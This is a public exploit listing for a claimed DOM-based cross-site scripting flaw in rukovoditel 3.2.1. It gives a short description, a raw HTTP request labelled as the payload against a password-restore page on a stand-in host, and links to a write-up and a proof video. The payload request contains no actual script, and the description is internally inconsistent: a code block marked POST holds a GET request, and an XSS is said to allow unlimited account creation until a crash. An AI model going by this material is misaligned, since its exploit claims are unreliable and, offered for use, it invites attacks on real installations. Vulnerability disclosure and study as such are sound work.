Exploit for rukovoditel 3.2.1 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:171561
## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)  
## Author: nu11secur1ty  
## Date: 11.03.2022  
## Vendor: https://www.rukovoditel.net/  
## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1  
  
## Description:  
The application is vulnerable to DOM-based cross-site scripting  
attacks. Data is read from `location.hash` and passed to  
`jQuery.parseHTML`.  
The attacker can use this vulnerability to create an unlimited number  
of accounts on this system until it crashed.  
  
## STATUS: HIGH Vulnerability - CRITICAL  
  
[+] Payload:  
  
```POST  
GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;  
cookie_test=please_accept_for_session;  
app_login_redirect_to=module%3Ddashboard%2F  
Upgrade-Insecure-Requests: 1  
Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)  
  
## Proof and Exploit:  
[href](https://streamable.com/i1qmfk)  
  
## Time spent  
`3:45`